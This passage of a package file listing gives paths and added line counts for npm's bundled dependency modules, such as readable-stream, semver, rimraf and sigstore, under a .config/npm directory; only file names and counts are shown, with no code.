  1746. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/dist/util/unesc.js +76 -0
  1747. package/.config/npm/node_global/lib/node_modules/npm/node_modules/postcss-selector-parser/package.json +79 -0
  1748. package/.config/npm/node_global/lib/node_modules/npm/node_modules/proc-log/LICENSE +15 -0
  1749. package/.config/npm/node_global/lib/node_modules/npm/node_modules/proc-log/lib/index.js +23 -0
  1750. package/.config/npm/node_global/lib/node_modules/npm/node_modules/proc-log/package.json +44 -0
  1751. package/.config/npm/node_global/lib/node_modules/npm/node_modules/process/LICENSE +22 -0
  1752. package/.config/npm/node_global/lib/node_modules/npm/node_modules/process/browser.js +184 -0
  1753. package/.config/npm/node_global/lib/node_modules/npm/node_modules/process/index.js +2 -0
  1754. package/.config/npm/node_global/lib/node_modules/npm/node_modules/process/package.json +27 -0
  1755. package/.config/npm/node_global/lib/node_modules/npm/node_modules/process/test.js +199 -0
  1756. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-all-reject-late/LICENSE +15 -0
  1757. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-all-reject-late/index.js +27 -0
  1758. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-all-reject-late/package.json +22 -0
  1759. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-all-reject-late/test/index.js +88 -0
  1760. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-call-limit/LICENSE +15 -0
  1761. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-call-limit/index.js +52 -0
  1762. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-call-limit/package.json +29 -0
  1763. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-inflight/LICENSE +14 -0
  1764. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-inflight/inflight.js +36 -0
  1765. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-inflight/package.json +24 -0
  1766. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-retry/LICENSE +19 -0
  1767. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-retry/index.js +52 -0
  1768. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-retry/package.json +37 -0
  1769. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promise-retry/test/test.js +263 -0
  1770. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promzard/LICENSE +15 -0
  1771. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promzard/lib/index.js +175 -0
  1772. package/.config/npm/node_global/lib/node_modules/npm/node_modules/promzard/package.json +48 -0
  1773. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/.travis.yml +3 -0
  1774. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/LICENSE +222 -0
  1775. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/README.md +82 -0
  1776. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/bin/qrcode-terminal.js +101 -0
  1777. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/example/basic.js +2 -0
  1778. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/example/basic.png +0 -0
  1779. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/example/callback.js +4 -0
  1780. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/example/small-qrcode.js +6 -0
  1781. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/lib/main.js +100 -0
  1782. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/package.json +37 -0
  1783. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/test/main.js +63 -0
  1784. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QR8bitByte.js +22 -0
  1785. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRBitBuffer.js +38 -0
  1786. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRErrorCorrectLevel.js +7 -0
  1787. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRMaskPattern.js +10 -0
  1788. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRMath.js +44 -0
  1789. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRMode.js +6 -0
  1790. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRPolynomial.js +66 -0
  1791. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRRSBlock.js +298 -0
  1792. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/QRUtil.js +272 -0
  1793. package/.config/npm/node_global/lib/node_modules/npm/node_modules/qrcode-terminal/vendor/QRCode/index.js +462 -0
  1794. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read/LICENSE +15 -0
  1795. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read/lib/read.js +82 -0
  1796. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read/package.json +52 -0
  1797. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-cmd-shim/LICENSE +14 -0
  1798. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-cmd-shim/lib/index.js +75 -0
  1799. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-cmd-shim/package.json +47 -0
  1800. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-package-json/LICENSE +15 -0
  1801. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-package-json/lib/read-json.js +589 -0
  1802. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-package-json/package.json +59 -0
  1803. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-package-json-fast/LICENSE +15 -0
  1804. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-package-json-fast/lib/index.js +141 -0
  1805. package/.config/npm/node_global/lib/node_modules/npm/node_modules/read-package-json-fast/package.json +47 -0
  1806. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/LICENSE +47 -0
  1807. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/_stream_duplex.js +4 -0
  1808. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/_stream_passthrough.js +4 -0
  1809. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/_stream_readable.js +4 -0
  1810. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/_stream_transform.js +4 -0
  1811. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/_stream_writable.js +4 -0
  1812. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/add-abort-signal.js +49 -0
  1813. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/buffer_list.js +157 -0
  1814. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/compose.js +194 -0
  1815. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/destroy.js +290 -0
  1816. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/duplex.js +143 -0
  1817. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/duplexify.js +379 -0
  1818. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/end-of-stream.js +281 -0
  1819. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/from.js +98 -0
  1820. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/lazy_transform.js +51 -0
  1821. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/legacy.js +89 -0
  1822. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/operators.js +457 -0
  1823. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/passthrough.js +39 -0
  1824. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/pipeline.js +465 -0
  1825. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/readable.js +1247 -0
  1826. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/state.js +27 -0
  1827. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/transform.js +180 -0
  1828. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/utils.js +321 -0
  1829. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/streams/writable.js +817 -0
  1830. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/internal/validators.js +510 -0
  1831. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/ours/browser.js +35 -0
  1832. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/ours/errors.js +341 -0
  1833. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/ours/index.js +65 -0
  1834. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/ours/primordials.js +101 -0
  1835. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/ours/util.js +128 -0
  1836. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/stream/promises.js +43 -0
  1837. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/lib/stream.js +136 -0
  1838. package/.config/npm/node_global/lib/node_modules/npm/node_modules/readable-stream/package.json +84 -0
  1839. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/License +21 -0
  1840. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/Makefile +18 -0
  1841. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/equation.gif +0 -0
  1842. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/example/dns.js +31 -0
  1843. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/example/stop.js +40 -0
  1844. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/index.js +1 -0
  1845. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/lib/retry.js +100 -0
  1846. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/lib/retry_operation.js +158 -0
  1847. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/package.json +32 -0
  1848. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/test/common.js +10 -0
  1849. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/test/integration/test-forever.js +24 -0
  1850. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/test/integration/test-retry-operation.js +258 -0
  1851. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/test/integration/test-retry-wrap.js +101 -0
  1852. package/.config/npm/node_global/lib/node_modules/npm/node_modules/retry/test/integration/test-timeouts.js +69 -0
  1853. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/LICENSE +15 -0
  1854. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/README.md +101 -0
  1855. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/bin.js +68 -0
  1856. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/brace-expansion/LICENSE +21 -0
  1857. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/brace-expansion/index.js +201 -0
  1858. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/brace-expansion/package.json +47 -0
  1859. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/glob/LICENSE +21 -0
  1860. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/glob/common.js +238 -0
  1861. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/glob/glob.js +790 -0
  1862. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/glob/package.json +55 -0
  1863. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/glob/sync.js +486 -0
  1864. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/minimatch/LICENSE +15 -0
  1865. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/minimatch/minimatch.js +947 -0
  1866. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/node_modules/minimatch/package.json +33 -0
  1867. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/package.json +32 -0
  1868. package/.config/npm/node_global/lib/node_modules/npm/node_modules/rimraf/rimraf.js +360 -0
  1869. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safe-buffer/LICENSE +21 -0
  1870. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safe-buffer/index.js +65 -0
  1871. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safe-buffer/package.json +51 -0
  1872. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safer-buffer/LICENSE +21 -0
  1873. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safer-buffer/Porting-Buffer.md +268 -0
  1874. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safer-buffer/dangerous.js +58 -0
  1875. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safer-buffer/package.json +34 -0
  1876. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safer-buffer/safer.js +77 -0
  1877. package/.config/npm/node_global/lib/node_modules/npm/node_modules/safer-buffer/tests.js +406 -0
  1878. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/LICENSE +15 -0
  1879. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/README.md +635 -0
  1880. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/bin/semver.js +197 -0
  1881. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/classes/comparator.js +141 -0
  1882. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/classes/index.js +5 -0
  1883. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/classes/range.js +536 -0
  1884. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/classes/semver.js +302 -0
  1885. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/clean.js +6 -0
  1886. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/cmp.js +52 -0
  1887. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/coerce.js +52 -0
  1888. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/compare-build.js +7 -0
  1889. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/compare-loose.js +3 -0
  1890. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/compare.js +5 -0
  1891. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/diff.js +65 -0
  1892. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/eq.js +3 -0
  1893. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/gt.js +3 -0
  1894. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/gte.js +3 -0
  1895. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/inc.js +19 -0
  1896. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/lt.js +3 -0
  1897. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/lte.js +3 -0
  1898. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/major.js +3 -0
  1899. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/minor.js +3 -0
  1900. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/neq.js +3 -0
  1901. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/parse.js +16 -0
  1902. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/patch.js +3 -0
  1903. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/prerelease.js +6 -0
  1904. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/rcompare.js +3 -0
  1905. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/rsort.js +3 -0
  1906. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/satisfies.js +10 -0
  1907. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/sort.js +3 -0
  1908. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/functions/valid.js +6 -0
  1909. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/index.js +89 -0
  1910. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/internal/constants.js +30 -0
  1911. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/internal/debug.js +9 -0
  1912. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/internal/identifiers.js +23 -0
  1913. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/internal/parse-options.js +15 -0
  1914. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/internal/re.js +193 -0
  1915. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/node_modules/lru-cache/LICENSE +15 -0
  1916. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/node_modules/lru-cache/index.js +334 -0
  1917. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/node_modules/lru-cache/package.json +34 -0
  1918. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/package.json +87 -0
  1919. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/preload.js +2 -0
  1920. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/range.bnf +16 -0
  1921. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/gtr.js +4 -0
  1922. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/intersects.js +7 -0
  1923. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/ltr.js +4 -0
  1924. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/max-satisfying.js +25 -0
  1925. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/min-satisfying.js +24 -0
  1926. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/min-version.js +61 -0
  1927. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/outside.js +80 -0
  1928. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/simplify.js +47 -0
  1929. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/subset.js +247 -0
  1930. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/to-comparators.js +8 -0
  1931. package/.config/npm/node_global/lib/node_modules/npm/node_modules/semver/ranges/valid.js +11 -0
  1932. package/.config/npm/node_global/lib/node_modules/npm/node_modules/set-blocking/LICENSE.txt +14 -0
  1933. package/.config/npm/node_global/lib/node_modules/npm/node_modules/set-blocking/index.js +7 -0
  1934. package/.config/npm/node_global/lib/node_modules/npm/node_modules/set-blocking/package.json +42 -0
  1935. package/.config/npm/node_global/lib/node_modules/npm/node_modules/shebang-command/index.js +19 -0
  1936. package/.config/npm/node_global/lib/node_modules/npm/node_modules/shebang-command/license +9 -0
  1937. package/.config/npm/node_global/lib/node_modules/npm/node_modules/shebang-command/package.json +34 -0
  1938. package/.config/npm/node_global/lib/node_modules/npm/node_modules/shebang-regex/index.js +2 -0
  1939. package/.config/npm/node_global/lib/node_modules/npm/node_modules/shebang-regex/license +9 -0
  1940. package/.config/npm/node_global/lib/node_modules/npm/node_modules/shebang-regex/package.json +35 -0
  1941. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/LICENSE.txt +16 -0
  1942. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/cjs/browser.js +10 -0
  1943. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/cjs/index.js +272 -0
  1944. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/cjs/package.json +3 -0
  1945. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/cjs/signals.js +42 -0
  1946. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/mjs/browser.js +4 -0
  1947. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/mjs/index.js +268 -0
  1948. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/mjs/package.json +3 -0
  1949. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/dist/mjs/signals.js +39 -0
  1950. package/.config/npm/node_global/lib/node_modules/npm/node_modules/signal-exit/package.json +106 -0
  1951. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/LICENSE +202 -0
  1952. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/README.md +165 -0
  1953. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/bin/sigstore.js +17 -0
  1954. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/format.d.ts +5 -0
  1955. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/format.js +20 -0
  1956. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/index.d.ts +15 -0
  1957. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/index.js +39 -0
  1958. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/chain.d.ts +3 -0
  1959. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/chain.js +63 -0
  1960. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/index.d.ts +2 -0
  1961. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/index.js +22 -0
  1962. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/sct.d.ts +3 -0
  1963. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/sct.js +30 -0
  1964. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/signer.d.ts +3 -0
  1965. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/ca/verify/signer.js +143 -0
  1966. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/cli/index.d.ts +1 -0
  1967. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/cli/index.js +125 -0
  1968. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/config.d.ts +54 -0
  1969. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/config.js +162 -0
  1970. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/error.d.ts +20 -0
  1971. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/error.js +42 -0
  1972. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/error.d.ts +10 -0
  1973. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/error.js +21 -0
  1974. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/fulcio.d.ts +38 -0
  1975. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/fulcio.js +51 -0
  1976. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/index.d.ts +4 -0
  1977. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/index.js +26 -0
  1978. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/rekor.d.ts +41 -0
  1979. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/rekor.js +115 -0
  1980. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/tsa.d.ts +18 -0
  1981. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/external/tsa.js +47 -0
  1982. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/ci.d.ts +11 -0
  1983. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/ci.js +75 -0
  1984. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/index.d.ts +30 -0
  1985. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/index.js +51 -0
  1986. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/issuer.d.ts +15 -0
  1987. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/issuer.js +53 -0
  1988. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/oauth.d.ts +26 -0
  1989. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/oauth.js +197 -0
  1990. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/provider.d.ts +3 -0
  1991. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/identity/provider.js +2 -0
  1992. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/index.d.ts +2 -0
  1993. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/index.js +27 -0
  1994. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/sign.d.ts +28 -0
  1995. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/sign.js +120 -0
  1996. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/sigstore-utils.d.ts +8 -0
  1997. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/sigstore-utils.js +80 -0
  1998. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/sigstore.d.ts +23 -0
  1999. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/sigstore.js +146 -0
  2000. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/format.d.ts +7 -0
  2001. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/format.js +134 -0
  2002. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/index.d.ts +23 -0
  2003. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/index.js +75 -0
  2004. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/body.d.ts +2 -0
  2005. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/body.js +152 -0
  2006. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/index.d.ts +2 -0
  2007. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/index.js +83 -0
  2008. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/merkle.d.ts +2 -0
  2009. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/merkle.js +109 -0
  2010. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/set.d.ts +2 -0
  2011. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tlog/verify/set.js +67 -0
  2012. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tsa/index.d.ts +13 -0
  2013. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/tsa/index.js +47 -0
  2014. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/fetch.d.ts +6 -0
  2015. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/fetch.js +2 -0
  2016. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/signature.d.ts +16 -0
  2017. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/signature.js +15 -0
  2018. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/sigstore/index.d.ts +42 -0
  2019. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/sigstore/index.js +162 -0
  2020. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/sigstore/serialized.d.ts +65 -0
  2021. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/sigstore/serialized.js +2 -0
  2022. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/sigstore/validate.d.ts +15 -0
  2023. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/sigstore/validate.js +88 -0
  2024. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/utility.d.ts +14 -0
  2025. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/types/utility.js +18 -0
  2026. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/dump.d.ts +2 -0
  2027. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/dump.js +97 -0
  2028. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/error.d.ts +4 -0
  2029. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/error.js +24 -0
  2030. package/.config/npm/node_global/lib/node_modules/npm/node_modules/sigstore/dist/util/asn1/index.d.ts +1 -0
